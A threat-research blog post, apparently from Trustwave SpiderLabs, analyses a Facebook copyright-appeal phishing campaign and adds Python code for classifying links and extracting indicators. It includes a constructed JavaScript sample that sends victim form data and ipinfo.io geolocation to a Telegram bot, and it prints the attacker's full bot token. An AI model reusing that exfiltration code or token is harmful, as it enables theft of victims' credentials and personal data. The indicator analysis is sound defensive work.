Meta owns two of the largest social media platforms today, Facebook and Instagram. These platforms have become the modern gateway for people not just to socialize and follow the lives of famous personalities, but more importantly, to stay connected with friends and loved ones. The sites have also become effective channels for organizations to advertise and disseminate information. However, that global reach has also made them an attractive avenue for cybercriminals.
Trustwave SpiderLabs previously released two blogs about Facebook and Instagram phishing. The common denominator between the two is the use of phony notifications that lure victims into believing they have violated the platform's terms. The victim is then told to submit an appeal through a crafted phishing page to avoid losing access to their account. This social engineering tactic is not new, but cybercriminals keep refining it, finding ever more sophisticated ways to evade security controls and filters.
Recently, we came across another example in the same vein, which we have dubbed Meta-Phish. A successful Meta-Phish attack can result in the loss of Personally Identifiable Information (PII), login credentials, and the victim's Facebook profile link.
Figure 1: Phishing email message
Instead of the usual phishing link to an external landing page, this mail sample carries a link that points to an actual Facebook post. The post appears legitimate because it is published from a dummy ‘Page Support’ profile that uses the Facebook logo as its display picture. At first glance the page looks genuine, but the link provided in the post leads to an external domain. This is what gives the lure its credibility: the link in the email really does go to facebook.com, and the malicious destination only appears one hop later.
Figure 2: Dummy ‘Page Support’ profile page
The link in the post leads to the main phishing URL, hxxps://meta[.]forbusinessuser[.]xyz/main[.]php, which mimics Facebook's copyright appeal page. Note that the deceptive part of this hostname is the ‘meta’ subdomain; the registrable domain is forbusinessuser[.]xyz, which has nothing to do with Meta.
Figure 3: Fake Facebook Copyright Appeal page
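To make that hop concrete, here is an added example (not code from the SpiderLabs post or from the kit) that classifies the outbound links found in a post: it unwraps Facebook's l.facebook.com link shim (an assumption about how posts render external links; the post does not discuss the shim), then checks the final host against an illustrative allowlist of Meta domains using whole-label matching, so that look-alikes such as meta.forbusinessuser.xyz and facebook.com.evil.example are reported as external. The allowlist and shim hosts are assumptions, not an authoritative list of Meta properties.

```python
"""Does a link found in a Facebook post really stay on a Meta-owned domain, or does it
leave for an external site, as the 'Page Support' post in the Meta-Phish campaign does?

Added example; this is not code from the SpiderLabs post or from the phishing kit.
Assumptions, labelled: META_DOMAINS is an illustrative allowlist, not an authoritative
list of Meta properties, and the Facebook outbound link shim (l.facebook.com/l.php?u=...)
is unwrapped because posts render external links through it; the post does not discuss it.
"""
from urllib.parse import parse_qs, urlparse

# Registrable domains treated as Meta-owned (assumption: illustrative, not exhaustive).
META_DOMAINS = {"facebook.com", "fb.com", "instagram.com", "meta.com", "messenger.com"}

# Hosts Facebook uses to wrap outbound links (assumption: the common shim hosts).
LINK_SHIM_HOSTS = {"l.facebook.com", "lm.facebook.com", "l.instagram.com"}


def unwrap_link_shim(url: str) -> str:
    """Return the real destination if url is a link-shim URL, otherwise url unchanged.
    parse_qs already percent-decodes the 'u' parameter, so no second unquote is needed."""
    parsed = urlparse(url)
    if parsed.hostname in LINK_SHIM_HOSTS and parsed.path == "/l.php":
        target = parse_qs(parsed.query).get("u")
        if target:
            return target[0]
    return url


def host_is_meta(host: str) -> bool:
    """True only if host equals, or is a proper subdomain of, an allowlisted domain.
    Matching on whole labels rejects look-alikes such as facebook.com.evil.example and
    meta.forbusinessuser.xyz, both of which a substring test ('facebook' in host,
    'meta' in host) would wave through."""
    host = host.lower().rstrip(".")
    return any(host == dom or host.endswith("." + dom) for dom in META_DOMAINS)


def classify_post_link(url: str) -> dict:
    """Classify one outbound link as 'meta' or 'external'.
    Also reports the final host and whether an fbclid parameter was present, since the
    campaign's destination URL carried a hardcoded ?fbclid=123 resembling the click
    identifier Facebook appends to outbound links."""
    final = unwrap_link_shim(url)
    parsed = urlparse(final)
    host = parsed.hostname or ""
    return {
        "final_url": final,
        "host": host,
        "verdict": "meta" if host_is_meta(host) else "external",
        "has_fbclid": "fbclid" in parse_qs(parsed.query),
    }


if __name__ == "__main__":
    # The campaign's first-hop post, its destination (bare and shim-wrapped),
    # and one constructed look-alike host.
    for u in (
        "https://www.facebook.com/01oix2/posts/102106376025783",
        "https://meta.forbusinessuser.xyz/?fbclid=123",
        "https://l.facebook.com/l.php?u=https%3A%2F%2Fmeta.forbusinessuser.xyz%2Fmain.php",
        "https://facebook.com.evil.example/appeal",
    ):
        print(classify_post_link(u))
```

The point of the whole-label check is that both hostnames in this campaign contain a Meta brand string somewhere; only the registrable domain tells you who actually controls the page.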
Any information that unsuspecting victims enter in the form is sent to the cybercriminals when they click the Send button, along with the victim's client IP address and geolocation information. Let's look at the source code to see how this unfolds.
Inspecting the source code of main[.]php reveals a reference to an external JavaScript file, index[.]js, which contains the function that reads every value entered into the form when the Send button is triggered.
Figure 4: main[.]php source code
Figure 5: index[.]js source code: Form value retrieval
All of the retrieved information is then sent to a Telegram account controlled by the attacker via the Telegram Bot API.
Figure 6: index[.]js source code: Telegram bot API call
All queries to the Telegram Bot API must be served over HTTPS and take the form https://api.telegram[.]org/bot<token>/METHOD_NAME, where the literal string bot is followed directly by the bot token. From this, we can identify the token of the bot used in this attack: 5213906361:AAEAYFxbgjU7aBqrUm3ufkkt8UybZP_Lnbo (the numeric part before the colon is the bot's ID). Because this token is the only credential the Bot API requires, whoever holds it can act as the bot, and it also serves as a reliable indicator for hunting other pages that report to the same operator.
Index[.]js also uses the external service ipinfo.io to harvest the victim's client IP address and geolocation information. This information is sent to the cybercriminals over the same Telegram Bot API channel.
Figure 7: Index[.]js source code: client IP and geolocation harvest
Figure 8: Client data harvested
Finally, the user is redirected to the next page, checkpoint[.]php.
Figure 9: Index[.]js source code
This second page, hosted on the same domain, presents a fake One Time Password (OTP) check.
Figure 10: Phishing page with OTP request
Based on the code, any value the user enters only produces an error message; no OTP is ever validated. Several functions do, however, implement the countdown timer that is displayed while the user is asked to enter the OTP.
Figure 11: checkpoint[.]php source code
If the user clicks ‘Need another way to authenticate?’, a message box appears with some steps on what to do next. If the user clicks ‘Get Code’, however, they are redirected to a legitimate Facebook site that requires a log-in.
Figure 12: ‘Need another way to authenticate?’ page
The source code of checkpoint[.]php also reveals the use of Google Analytics with the tracking ID UA-177207786-1.
Figure 13: checkpoint[.]php source code
Google Analytics is a web analytics service, part of Google's Marketing Platform, that tracks and reports website traffic.
The tracking ID (also called the property ID) identifies the Google Analytics account and property that collect the data. The UA prefix stands for ‘Universal Analytics’, the version of Google Analytics in use at the time of this research; Google has since replaced it with Google Analytics 4, whose measurement IDs carry a G- prefix instead. The digits that follow are the Google Analytics account ID. The final number is the index of the property within that account. Up to 50 properties could be connected to the same account, so this suffix ranges from 1 to 50.
Figure 14: Google Analytics ID Structure
The tracking ID is embedded in the Global Site Tag (gtag.js) snippet that the account's admin area provides for pasting into every page to be tracked. An operator who reuses the same snippet across multiple phishing pages therefore leaves the same ID in every one of them.
Searching for this Google Analytics ID in VirusTotal returns several other Facebook phishing URLs, which makes the ID a useful pivot for threat hunting. One caveat: a shared tracking ID shows that the pages were deployed with the same analytics configuration, which usually means the same operator or the same kit, but kits are also copied and resold, so corroborate the link with other indicators before attributing the pages to a single actor.
Figure 15: Sample screenshot of VirusTotal search result using Google Analytics ID
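The Telegram Bot API URL structure and the Google Analytics ID structure described above are both fixed formats, which makes them easy to extract from a captured kit and use as pivots. The following is an added example, not code from the SpiderLabs post or from the kit, that pulls both from page source along with any ipinfo.io lookups. The embedded JavaScript is a constructed stand-in for the described index.js and checkpoint.php, and the sendMessage method in it is an assumption, since the post only shows METHOD_NAME.

```python
"""Pull the operator-side indicators the Meta-Phish kit leaves in its page source:
Telegram Bot API tokens (the exfiltration channel), ipinfo.io lookups (victim
geolocation) and Google Analytics tracking IDs (the pivot used in VirusTotal).

Added example; not code from the SpiderLabs post or from the kit. SAMPLE_SOURCE is a
constructed stand-in for the described index.js / checkpoint.php behaviour, and the
sendMessage method it uses is an assumption: the post shows only METHOD_NAME.
"""
from __future__ import annotations

import json
import re

# Bot API calls look like https://api.telegram.org/bot<token>/<method>. The token is
# <numeric bot id>:<secret>; the leading 'bot' is literal path text, not part of the token.
# The method segment is optional so bare IoC-list URLs ending in '/' are also recognised.
TELEGRAM_RE = re.compile(
    r"https?://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)"
    r"(?:/(?P<method>\w+))?"
)
IPINFO_RE = re.compile(r"https?://ipinfo\.io/[^\s'\"]*")
# Universal Analytics tracking ID: UA-<account id>-<property index>.
GA_UA_RE = re.compile(r"\bUA-(?P<account>\d+)-(?P<prop>\d+)\b")

SAMPLE_SOURCE = r"""
// constructed sample; mirrors the behaviour described for index.js / checkpoint.php
var bot = "https://api.telegram.org/bot5213906361:AAEAYFxbgjU7aBqrUm3ufkkt8UybZP_Lnbo/sendMessage";
fetch("https://ipinfo.io/json").then(r => r.json()).then(geo => {
  fetch(bot + "?chat_id=" + chat + "&text=" + encodeURIComponent(form + " " + geo.ip + " " + geo.city));
});
gtag('config', 'UA-177207786-1');
"""


def extract_telegram_bots(src: str) -> list[dict]:
    """Return one record per distinct bot token with the API methods called on it."""
    found: dict[str, dict] = {}
    for m in TELEGRAM_RE.finditer(src):
        token = f"{m['bot_id']}:{m['secret']}"
        rec = found.setdefault(token, {"bot_id": int(m["bot_id"]), "token": token, "methods": set()})
        if m["method"]:
            rec["methods"].add(m["method"])
    return [dict(r, methods=sorted(r["methods"])) for r in found.values()]


def parse_ga_id(tracking_id: str) -> dict | None:
    """Split a UA tracking ID into account ID and property index; None if it is not a
    UA ID (a GA4 'G-...' measurement ID, for instance)."""
    m = GA_UA_RE.fullmatch(tracking_id)
    if not m:
        return None
    prop = int(m["prop"])
    return {
        "account_id": m["account"],
        "property_index": prop,
        # Documented limit of 50 properties per account, so the index is expected in 1..50.
        "index_in_documented_range": 1 <= prop <= 50,
    }


def extract_indicators(src: str) -> dict:
    """Aggregate all three indicator types from one page's source."""
    return {
        "telegram_bots": extract_telegram_bots(src),
        "ipinfo_urls": sorted(set(IPINFO_RE.findall(src))),
        "ga_ids": sorted({m.group(0) for m in GA_UA_RE.finditer(src)}),
    }


if __name__ == "__main__":
    print(json.dumps(extract_indicators(SAMPLE_SOURCE), indent=2))
```

Run over the constructed sample, it reports bot ID 5213906361, the full token, the ipinfo.io endpoint and UA-177207786-1 (account 177207786, property 1). The same regexes work over a directory of scraped kit sources or a proxy log; the Telegram token and the GA account ID, rather than the phishing domain, are the values to pivot on, since the VirusTotal search above showed one GA ID spanning several phishing domains.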
During our research, we also discovered several other phony Facebook accounts that use this social engineering technique:
Figure 16: Fake Appeal Form page
Figure 17: Fake Account Restrictions page
Figure 18: Fake Social Network Violations page
Figure 19: Fake Page Recovery Notifications page
Most of these URLs use free web hosting sites or URL shortening services that redirect to the destination phishing site. Some also use newly registered domains that are affiliated with neither Facebook nor Instagram.
Posts or pages of this type can be found easily by searching for specific keywords such as ‘appeal form’ in Facebook's search box:
Figure 20: Text box search for Appeal Form page
To wrap up, these fake Facebook ‘Violation’ notifications use real Facebook pages to redirect to external phishing sites. Users are advised to be extra careful when receiving violation notifications and not to be fooled by the apparent legitimacy of the initial links: a link that starts on facebook.com says nothing about where it ends up, so check the domain of whichever page actually asks for credentials, an OTP or personal information.
URLs
hxxps://www[.]facebook[.]com/01oix2/posts/102106376025783
hxxps://meta[.]forbusinessuser[.]xyz/?fbclid=123
hxxps://meta[.]forbusinessuser[.]xyz/main[.]php
hxxps://meta[.]forbusinessuser[.]xyz/checkpoint[.]php
hxxps://api[.]telegram[.]org/bot5213906361:AAEAYFxbgjU7aBqrUm3ufkkt8UybZP_Lnbo/
Copyright © 2024 Trustwave Holdings, Inc. All rights reserved.